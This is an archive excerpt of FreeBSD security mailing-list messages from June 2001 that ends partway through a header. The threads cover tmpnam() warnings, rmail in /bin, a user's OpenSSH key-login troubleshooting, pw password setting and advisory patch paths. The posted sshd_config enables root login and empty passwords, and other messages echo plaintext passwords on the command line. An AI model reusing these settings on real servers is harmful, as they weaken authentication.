List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > If its not in your code, its most likely in one of the libraries that it > uses. Thanks for your answer. I was reading the man of the functions: tmpnam() tempnam, tmpfile, tmpnam - temporary file routines mkstemp() make temporary file name (unique) But i am not sure about how improvement the libraries... i mean, there is a patch or something for this specific error??? Thanks for any "smart" answer. > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Chris Johnson > Sent: Thursday, June 07, 2001 9:36 PM > To: Buliwyf McGraw > Cc: security@FreeBSD.ORG > Subject: Re: Unsafe Message > > > On Thu, Jun 07, 2001 at 08:32:32PM -0500, Buliwyf McGraw wrote: > > Everytime that i compile something on my server, i get this message: > > > > warning: tmpnam() possibly used unsafely; consider using mkstemp() > > > > What it means? > > tmpnam() was possibly used unsafely > > > how i can avoid it? > > consider using mkstemp() > > Chris > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 21:20:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from world.anarchy.com (world.anarchy.com [63.147.25.37]) by hub.freebsd.org (Postfix) with ESMTP id 1B78B37B406 for ; Thu, 7 Jun 2001 21:20:12 -0700 (PDT) (envelope-from azrael@world.anarchy.com) Received: (from azrael@localhost) by world.anarchy.com (8.11.3/8.11.3) id f584KDn05374 for freebsd-security@FreeBSD.ORG; Thu, 7 Jun 2001 21:20:13 -0700 (PDT) (envelope-from azrael) Date: Thu, 7 Jun 2001 21:20:13 -0700 From: Vince Hoang To: freebsd-security@FreeBSD.ORG Subject: Re: root & toor Message-ID: <20010607212013.B4738@anarchy.com> References: <20010607100241.N30276-100000@axis.tdd.lt> <20010607182152.B724@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010607182152.B724@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Jun 07, 2001 at 06:21:52PM +0300 User-Agent: Mutt/1.2.5i (FreeBSD 4.3-STABLE i386) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > All login shells in the FreeBSD base system are statically linked - > they are all placed in /bin, and everything in /bin and /sbin *must* > be statically linked for obvious reasons (think NFS-mounted /usr). Bug? # uname -r 4.3-STABLE # ldd /bin/rmail /bin/rmail: libc.so.4 => /usr/lib/libc.so.4 (0x28067000) -Vince To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 21:30: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from gnome01.sovam.com (gnome01.sovam.com [194.67.1.179]) by hub.freebsd.org (Postfix) with ESMTP id 09CAC37B403 for ; Thu, 7 Jun 2001 21:30:00 -0700 (PDT) (envelope-from avn@any.ru) Received: from ts9-a38.dial.sovam.com ([195.239.70.38]:29701 "EHLO srv2.any" ident: "TIMEDOUT" whoson: "-unregistered-" smtp-auth: TLS-CIPHER: TLS-PEER: ) by gnome01.sovam.com with ESMTP id ; Fri, 8 Jun 2001 08:29:44 +0400 Received: from localhost (avn@localhost) by srv2.any (8.11.3/8.11.3) with ESMTP id f584V8V17008; Fri, 8 Jun 2001 08:31:08 +0400 (MSD) (envelope-from avn@any.ru) Date: Fri, 8 Jun 2001 08:31:07 +0400 (MSD) From: "Alexey V. Neyman" X-X-Sender: To: Vince Hoang Cc: Subject: Re: root & toor In-Reply-To: <20010607212013.B4738@anarchy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi, there! On Thu, 7 Jun 2001, Vince Hoang wrote: >> All login shells in the FreeBSD base system are statically linked - >> they are all placed in /bin, and everything in /bin and /sbin *must* >> be statically linked for obvious reasons (think NFS-mounted /usr). > >Bug? > ># uname -r >4.3-STABLE ># ldd /bin/rmail >/bin/rmail: > libc.so.4 => /usr/lib/libc.so.4 (0x28067000) man rmail: BUGS Rmail should not reside in /bin. -------------------------------------+------------------------------ Does the fish swallow the stone? | Regards, Alexey V. Neyman Perhaps, but that is not the point. | mailto: avn@any.ru ---------------------(Pkunk, SC2)----+------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 23: 5:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 8338F37B405 for ; Thu, 7 Jun 2001 23:05:12 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 13258 invoked by uid 1000); 8 Jun 2001 06:03:57 -0000 Date: Fri, 8 Jun 2001 09:03:57 +0300 From: Peter Pentchev To: "Alexey V. Neyman" Cc: Vince Hoang , freebsd-security@FreeBSD.ORG Subject: Re: root & toor Message-ID: <20010608090357.B12983@ringworld.oblivion.bg> Mail-Followup-To: "Alexey V. Neyman" , Vince Hoang , freebsd-security@FreeBSD.ORG References: <20010607212013.B4738@anarchy.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from avn@any.ru on Fri, Jun 08, 2001 at 08:31:07AM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 08, 2001 at 08:31:07AM +0400, Alexey V. Neyman wrote: > hi, there! > > On Thu, 7 Jun 2001, Vince Hoang wrote: > > >> All login shells in the FreeBSD base system are statically linked - > >> they are all placed in /bin, and everything in /bin and /sbin *must* > >> be statically linked for obvious reasons (think NFS-mounted /usr). > > > >Bug? > > > ># uname -r > >4.3-STABLE > ># ldd /bin/rmail > >/bin/rmail: > > libc.so.4 => /usr/lib/libc.so.4 (0x28067000) > > man rmail: > > BUGS > Rmail should not reside in /bin. Oh well, I didn't catch this one: NO_SENDMAIL & NO_UUCP in my /etc/make.conf :) But yes, this is apparently a documented bug - rmail is not part of the boot process, there is no real need for it in 'emergency' situations when /usr is not mounted yet, so no, it should not really reside in /bin. G'luck, Peter -- No language can express every thought unambiguously, least of all this one. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 4:47:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id E26D837B403 for ; Fri, 8 Jun 2001 04:47:22 -0700 (PDT) (envelope-from sheldonh@axl.seasidesoftware.co.za) Received: from axl.seasidesoftware.co.za (localhost [127.0.0.1]) by axl.seasidesoftware.co.za (8.11.3/8.11.3) with ESMTP id f58Bkh503723; Fri, 8 Jun 2001 13:46:47 +0200 (SAST) (envelope-from sheldonh@axl.seasidesoftware.co.za) From: Sheldon Hearn To: Buliwyf McGraw Cc: Michael Tang Helmeste , security@FreeBSD.ORG Subject: Re: Unsafe Message In-reply-to: Your message of "Thu, 07 Jun 2001 21:30:16 EST." Date: Fri, 08 Jun 2001 13:46:43 +0200 Message-ID: <3721.992000803@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 07 Jun 2001 21:30:16 EST, Buliwyf McGraw wrote: > But i am not sure about how improvement the libraries... i mean, there > is a patch or something for this specific error??? > > Thanks for any "smart" answer. The message is really there for people who know what to do about it. If you don't know how to patch the offending code so that it uses less guessable names for its temporary files, don't worry about the warning. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 7:46:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id C670337B40E for ; Fri, 8 Jun 2001 07:46:08 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA36576; Fri, 8 Jun 2001 10:46:00 -0400 (EDT) (envelope-from wollman) Date: Fri, 8 Jun 2001 10:46:00 -0400 (EDT) From: Garrett Wollman Message-Id: <200106081446.KAA36576@khavrinen.lcs.mit.edu> To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Subject: Re: root & toor In-Reply-To: <20010608090357.B12983@ringworld.oblivion.bg> References: <20010607212013.B4738@anarchy.com> <20010608090357.B12983@ringworld.oblivion.bg> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > But yes, this is apparently a documented bug - rmail is not part of the boot > process, there is no real need for it in 'emergency' situations when /usr > is not mounted yet, so no, it should not really reside in /bin. Unfortunately, as with /etc/rmt, it is part of a protocol the client implementations of which we do not control. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 7:47:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f4.law11.hotmail.com [64.4.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 7142E37B401 for ; Fri, 8 Jun 2001 07:47:04 -0700 (PDT) (envelope-from mishson@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 8 Jun 2001 07:47:03 -0700 Received: from 63.121.153.2 by lw11fd.law11.hotmail.msn.com with HTTP; Fri, 08 Jun 2001 14:47:03 GMT X-Originating-IP: [63.121.153.2] From: "Misha Kamushkin" To: freebsd-security@freebsd.org Subject: openssh auth. problem Date: Fri, 08 Jun 2001 07:47:03 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 08 Jun 2001 14:47:03.0651 (UTC) FILETIME=[E1A6E330:01C0F029] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hello, i think i tried everything under the sun to get this to work but with no results. i need to get ssh to work without prompting me for a password. i created id_dsa and id_dsa.pub with ssh-keygen. then i export the key with ssh-keygen -x. after that i copied the exported key to my server and renamed it known_hosts2 and i also tried athorized_keys2. i have enable hostbasedauthentication on both client and sever config files. here's client conf file: [root@ber ssh2]# cat ssh_config Host 1.1.1.1 ForwardAgent no ForwardX11 yes HostbasedAuthentication yes PreferredAuthentications hostbased,password # RhostsAuthentication no RhostsRSAAuthentication yes # RSAAuthentication yes # PasswordAuthentication yes FallBackToRsh no # UseRsh no # BatchMode no # CheckHostIP yes # StrictHostKeyChecking yes # IdentityFile ~/.ssh/known_hosts2 IdentityFile ~/.ssh/id_dsa # IdentityFile ~/.ssh/id_rsa Port 22 Protocol 2 Cipher blowfish # EscapeChar ~ here's server config file: [root@lit ssh2]# cat sshd_config Port 22 Protocol 2 #ListenAddress 0.0.0.0 #ListenAddress :: HostKey /etc/ssh2/ssh_host_key HostKey /etc/ssh2/ssh_host_rsa_key HostKey /etc/ssh2/ssh_host_dsa_key ServerKeyBits 768 LoginGraceTime 600 KeyRegenerationInterval 3600 PermitRootLogin yes # # Don't read ~/.rhosts and ~/.shosts files IgnoreRhosts yes # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication #IgnoreUserKnownHosts yes StrictModes yes X11Forwarding no X11DisplayOffset 10 PrintMotd yes #PrintLastLog no KeepAlive yes # Logging SyslogFacility AUTH LogLevel INFO #obsoletes QuietMode and FascistLogging RhostsAuthentication no # # For this to work you will also need host keys in /etc/ssh2/ssh_known_hosts #RhostsRSAAuthentication yes # similar for protocol version 2 HostbasedAuthentication yes # RSAAuthentication yes # To disable tunneled clear text passwords, change to no here! PasswordAuthentication yes PermitEmptyPasswords yes # Uncomment to disable s/key passwords #ChallengeResponseAuthentication no # Uncomment to enable PAM keyboard-interactive authentication # Warning: enabling this may bypass the setting of 'PasswordAuthentication' #PAMAuthenticationViaKbdInt yes # To change Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #AFSTokenPassing no #KerberosTicketCleanup no # Kerberos TGT Passing does only work with the AFS kaserver #KerberosTgtPassing yes #CheckMail yes #UseLogin no #MaxStartups 10:30:60 #Banner /etc/issue.net #ReverseMappingCheck yes Subsystem sftp /usr/local//libexec/sftp-server here's the output [root@ber ssh2]# ssh 2.2.2.2 -v OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090581f debug1: Reading configuration data /etc/ssh2/ssh_config debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 0 geteuid 0 anon 1 debug1: Connecting to 2.2.2.2 [2.2.2.2] port 22. debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 0/0 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /root/.ssh/identity type -1 debug1: identity file /root/.ssh/id_rsa type -1 debug1: identity file /root/.ssh/id_dsa type 2 debug1: Remote protocol version 2.0, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: server->client aes128-cbc hmac-md5 none debug1: kex: client->server aes128-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 137/256 debug1: bits set: 1039/2049 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug1: Host '2.2.2.2' is known and matches the RSA host key. debug1: Found key in /root/.ssh/known_hosts2:1 debug1: bits set: 1022/2049 debug1: ssh_rsa_verify: signature correct debug1: kex_derive_keys debug1: newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password,keyboard-interactive,hostbased debug1: next auth method to try is publickey debug1: try privkey: /root/.ssh/identity debug1: try privkey: /root/.ssh/id_rsa debug1: try pubkey: /root/.ssh/id_dsa debug1: authentications that can continue: publickey,password,keyboard-interactive,hostbased debug1: next auth method to try is password root@2.2.2.2's password: what am i doing wrong. can somebody bring some light on this. what's the correct step by step configuration. thanks in advance. _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 7:57: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id 8737237B403; Fri, 8 Jun 2001 07:56:56 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id JAA17207; Fri, 8 Jun 2001 09:56:55 -0500 (CDT) Received: from sprint.centtech.com(10.177.173.31) by prox via smap (V2.1+anti-relay+anti-spam) id xma017200; Fri, 8 Jun 01 09:56:36 -0500 Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id JAA06905; Fri, 8 Jun 2001 09:56:35 -0500 (CDT) Message-ID: <3B20E7A4.21722896@centtech.com> Date: Fri, 08 Jun 2001 09:56:36 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Cc: freebsd-security@freebsd.org Subject: gif interfaces don't count packets? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After setting up a few VPN's with IPSEC using the gif interfaces, I found that the gif interfaces don't always count packets/bytes to/from the interface. It appears it only counts the packets if it is destined to or has a source from an IP that has been ifconfig'ed to the gif interface (I used netstat -bi to show this data). Any data passing through the gif/IPSEC tunnel should increase the counters, right? What am I missing here? Oh, incidentally, I'm using 4.2 Release for all my FreeBSD VPN boxes at this point, with Racoon as my key exchanger. Eric -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 For every complex problem, there is a solution that is simple, neat, and wrong. ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 7:57:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id 4528C37B401 for ; Fri, 8 Jun 2001 07:57:13 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr6.exu.ericsson.se (mr6u3.ericy.com [208.237.135.123]) by imr1.ericy.com (8.11.3/8.11.3) with ESMTP id f58Euja29257; Fri, 8 Jun 2001 09:56:45 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr6.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f58Euii15854; Fri, 8 Jun 2001 09:56:45 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f58EuiG02577; Fri, 8 Jun 2001 10:56:45 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Fri, 8 Jun 2001 10:56:42 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id MQM523RL; Fri, 8 Jun 2001 10:56:37 -0400 From: "Antoine Beaupre (LMC)" To: Garrett Wollman Cc: Peter Pentchev , freebsd-security@FreeBSD.ORG Message-ID: <3B20E7A3.DBC587BB@lmc.ericsson.se> Date: Fri, 08 Jun 2001 10:56:35 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.77 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Bug: rmail in /bin (was: root & toor) References: <20010607212013.B4738@anarchy.com> <20010608090357.B12983@ringworld.oblivion.bg> <200106081446.KAA36576@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > But yes, this is apparently a documented bug - rmail is not part of the boot > > process, there is no real need for it in 'emergency' situations when /usr > > is not mounted yet, so no, it should not really reside in /bin. > > Unfortunately, as with /etc/rmt, it is part of a protocol the > client implementations of which we do not control. IIRC, /etc/rmt is a symlink. Why not the same for rmail? $2% A. -- La sémantique est la gravité de l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 8: 8:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 123E237B401 for ; Fri, 8 Jun 2001 08:08:34 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.3/8.11.3) with ESMTP id f58FCvD55545; Fri, 8 Jun 2001 11:12:57 -0400 (EDT) Date: Fri, 8 Jun 2001 11:12:57 -0400 (EDT) From: Ralph Huntington To: "Karsten W. Rohrbach" Cc: David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords In-Reply-To: <20010607220227.W59617@mail.webmonster.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > correct me if i am just stupid, but i don't get the point > echo -n passW0Rd | pw -u testuser -h 1 > sets the password of "testuser" to "passW0Rd", soring it in the auth > system you prefer in encrypted form. am i missing something? Dang! I coulda had a V-8! I *knew* that other thing was inelegant. Oh but not -h 1, rather -h 0, as in echo -n passW0Rd | pw -u testuser -h 0 or other handy varieties, e.g., echo -n 'Better\!PWD' | pw -u testuser -m -s /sbin/nologin -h 0 Thanks Karsten. -=r=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 8:19:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 34BBD37B403 for ; Fri, 8 Jun 2001 08:19:49 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 4783 invoked by uid 1000); 8 Jun 2001 15:20:09 -0000 Date: Fri, 8 Jun 2001 17:20:09 +0200 From: "Karsten W. Rohrbach" To: Ralph Huntington Cc: David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010608172009.F3071@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Ralph Huntington , David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG References: <20010607220227.W59617@mail.webmonster.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="PPYy/fEw/8QCHSq3" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rjh@mohawk.net on Fri, Jun 08, 2001 at 11:12:57AM -0400 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --PPYy/fEw/8QCHSq3 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Ralph Huntington(rjh@mohawk.net)@2001.06.08 11:12:57 +0000: > > correct me if i am just stupid, but i don't get the point > > echo -n passW0Rd | pw -u testuser -h 1 > > sets the password of "testuser" to "passW0Rd", soring it in the auth > > system you prefer in encrypted form. am i missing something? >=20 > Dang! I coulda had a V-8! I *knew* that other thing was inelegant.=20 > Oh but not -h 1, rather -h 0, as in >=20 > echo -n passW0Rd | pw -u testuser -h 0 doh! sure, holy madonna of the sacred typo, save my soul ;-) >=20 > or other handy varieties, e.g., >=20 > echo -n 'Better\!PWD' | pw -u testuser -m -s /sbin/nologin -h 0 >=20 > Thanks Karsten. -=3Dr=3D- >=20 >=20 --=20 > CS Students do it in the pool. KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 --PPYy/fEw/8QCHSq3 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7IO0pM0BPTilkv0YRAqsgAJ9SHaw0YF+TTyTTrs6Sa+O4EnFWAQCgmgxM nnsB5entlmGB/B8DUCSScDY= =vA6B -----END PGP SIGNATURE----- --PPYy/fEw/8QCHSq3-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 9:34:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from gs166.sp.cs.cmu.edu (GS166.SP.CS.CMU.EDU [128.2.205.169]) by hub.freebsd.org (Postfix) with SMTP id 7BF2137B401 for ; Fri, 8 Jun 2001 09:34:10 -0700 (PDT) (envelope-from dpelleg@gs166.sp.cs.cmu.edu) Date: Fri, 8 Jun 2001 12:33:50 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid From: Dan Pelleg Reply-To: Dan Pelleg Message-Id: <20010608163410.7BF2137B401@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was trying this: 3) To patch your present system: download the relevant patch from the below location, and execute the following commands as root: But it seems that: 1. # cd /usr/src/lib/libc should be /usr/src/lib/libc/gen, right? (now in which directory do I "make depend && make all install"?) 2. # cd /usr/src/usr.bin/chgrp Probably /usr/src/usr.sbin/chown/ is a better choice. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 9:38:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 67ABD37B401 for ; Fri, 8 Jun 2001 09:38:21 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 51776 invoked by uid 1000); 8 Jun 2001 16:37:02 -0000 Date: Fri, 8 Jun 2001 19:37:02 +0300 From: Peter Pentchev To: Dan Pelleg Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts Message-ID: <20010608193702.E535@ringworld.oblivion.bg> Mail-Followup-To: Dan Pelleg , freebsd-security@freebsd.org References: <20010608163410.7BF2137B401@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010608163410.7BF2137B401@hub.freebsd.org>; from peldan@yahoo.com on Fri, Jun 08, 2001 at 12:33:50PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 08, 2001 at 12:33:50PM -0400, Dan Pelleg wrote: > > I was trying this: > 3) To patch your present system: download the relevant patch from the > below location, and execute the following commands as root: > > But it seems that: > 1. > # cd /usr/src/lib/libc > > should be /usr/src/lib/libc/gen, right? > > (now in which directory do I "make depend && make all install"?) No, it shouldn't. src/lib/libc/gen contains only part of the libc sources - the so-called 'generic' functions. In this case, you need to rebuild the whole of libc - libc/gen only builds several object files, not a whole library. > 2. > # cd /usr/src/usr.bin/chgrp > > Probably /usr/src/usr.sbin/chown/ is a better choice. Yes, this one is valid :) G'luck, Peter -- This sentence no verb. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 9:45:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from gs166.sp.cs.cmu.edu (GS166.SP.CS.CMU.EDU [128.2.205.169]) by hub.freebsd.org (Postfix) with SMTP id 4F02437B405 for ; Fri, 8 Jun 2001 09:45:26 -0700 (PDT) (envelope-from dpelleg@gs166.sp.cs.cmu.edu) Date: Fri, 8 Jun 2001 12:44:49 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid From: Dan Pelleg Reply-To: Dan Pelleg Message-Id: <20010608164526.4F02437B405@hub.freebsd.org> Sender: 